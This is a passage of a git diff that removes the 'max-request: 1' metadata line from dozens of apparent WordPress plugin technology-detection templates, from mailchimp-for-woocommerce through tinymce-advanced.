   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 50d2e6630b..53d409fb68 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 8d71f7bde9..0e908a9580 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index 5e1f97086e..aeb1875c57 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
-    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index d87d456a8c..7c15702305 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
-    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index aa9153241e..5ce87e6c71 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
-    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index 09641796a3..c342e6b45a 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
-    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index 28b70d09bf..e95041f555 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
-    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index b43c10ed7a..879a0d1c12 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
-    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index eb7e78bc7f..985f5d373a 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
-    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index 3da2ea50e1..bbc305b8de 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
-    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7a58c58f63..7e3e4e2d7e 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
-    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 5f99b8cac8..17ea142c46 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
-    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index b08876df04..953e4ab3d8 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
-    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 3f68dffe06..92107fa69c 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
-    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 34f9bde1d6..5e1fe4ef5c 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
-    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index d9f645328f..74fb3e6010 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
-    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index 8a1196fc9f..b9f70ba555 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
-    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 05025452b7..6486c02c9a 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
-    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 1db1b57708..81f58198d3 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
-    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index dafe6974f6..3743307dbc 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
-    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index ba05fb1e16..a4c6980041 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
-    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index a038adac53..e085f30e5a 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index 7f98d822a8..adf3387ddb 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
-    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index 89602f4264..eb6e1aaa5d 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
-    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index 2f6513ca42..b3c83cd0bf 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
-    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 982306b13c..96d8bd6aca 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-maker/
   metadata:
-    max-request: 1
     plugin_namespace: popup-maker
     wpscan: https://wpscan.com/plugin/popup-maker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml
index fdcac13b56..85955ac95e 100644
--- a/http/technologies/wordpress/plugins/post-smtp.yaml
+++ b/http/technologies/wordpress/plugins/post-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: post-smtp
     wpscan: https://wpscan.com/plugin/post-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml
index fc316f9f7a..a81fc892ca 100644
--- a/http/technologies/wordpress/plugins/post-types-order.yaml
+++ b/http/technologies/wordpress/plugins/post-types-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/post-types-order/
   metadata:
-    max-request: 1
     plugin_namespace: post-types-order
     wpscan: https://wpscan.com/plugin/post-types-order
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
index 975b63f5de..d9c6052cd7 100644
--- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
+++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/premium-addons-for-elementor/
   metadata:
-    max-request: 1
     plugin_namespace: premium-addons-for-elementor
     wpscan: https://wpscan.com/plugin/premium-addons-for-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml
index 5065659e82..afc1141e0c 100644
--- a/http/technologies/wordpress/plugins/pretty-link.yaml
+++ b/http/technologies/wordpress/plugins/pretty-link.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/pretty-link/
   metadata:
-    max-request: 1
     plugin_namespace: pretty-link
     wpscan: https://wpscan.com/plugin/pretty-link
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
index 732ffbc4eb..d44add9ca6 100644
--- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-captcha/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-captcha
     wpscan: https://wpscan.com/plugin/really-simple-captcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
index 12dffeb534..20ba5c2e16 100644
--- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml
+++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/really-simple-ssl/
   metadata:
-    max-request: 1
     plugin_namespace: really-simple-ssl
     wpscan: https://wpscan.com/plugin/really-simple-ssl
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml
index ae0e76c4bb..cbcf3cf09d 100644
--- a/http/technologies/wordpress/plugins/redirection.yaml
+++ b/http/technologies/wordpress/plugins/redirection.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redirection/
   metadata:
-    max-request: 1
     plugin_namespace: redirection
     wpscan: https://wpscan.com/plugin/redirection
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml
index b1718d1ccb..3311d42c94 100644
--- a/http/technologies/wordpress/plugins/redux-framework.yaml
+++ b/http/technologies/wordpress/plugins/redux-framework.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/redux-framework/
   metadata:
-    max-request: 1
     plugin_namespace: redux-framework
     wpscan: https://wpscan.com/plugin/redux-framework
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
index 7543ac1d55..46c1c22805 100644
--- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml
index 4a29cecdb0..7c13b8d2a4 100644
--- a/http/technologies/wordpress/plugins/safe-svg.yaml
+++ b/http/technologies/wordpress/plugins/safe-svg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/safe-svg/
   metadata:
-    max-request: 1
     plugin_namespace: safe-svg
     wpscan: https://wpscan.com/plugin/safe-svg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
index be281d91e6..53b30ba721 100644
--- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
+++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/seo-by-rank-math/
   metadata:
-    max-request: 1
     plugin_namespace: seo-by-rank-math
     wpscan: https://wpscan.com/plugin/seo-by-rank-math
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml
index 6bd95ec077..9555d7aebd 100644
--- a/http/technologies/wordpress/plugins/sg-cachepress.yaml
+++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-cachepress/
   metadata:
-    max-request: 1
     plugin_namespace: sg-cachepress
     wpscan: https://wpscan.com/plugin/sg-cachepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 1fd64a5279..180266f448 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
-    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 1bb9a283ce..17584cd064 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
-    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 7836d9554c..015fb97043 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
-    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index ccd72e427a..1d5224b457 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
-    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index 3622b2c6b3..aafd6c6a38 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
-    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index 9eff765d61..e10ab985da 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
-    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index c856e1fa9e..9881b591ae 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
-    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 008440cc58..0480b4b0e6 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
-    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 410776862f..26d525386b 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
-    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index f210a2a2f9..3920c5cf56 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
-    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f1dd1bf150..f556786f5a 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
-    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index a9ec913599..844e3d19a0 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
-    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index d38aeb0279..eb0f02f602 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
-    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 07c43b9d80..755efd53fa 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
-    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 83a849e11e..0403bb4e72 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
-    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index c6100637d9..cd2632ea05 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
-    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index 1f188b66c6..b5f8b822c7 100644
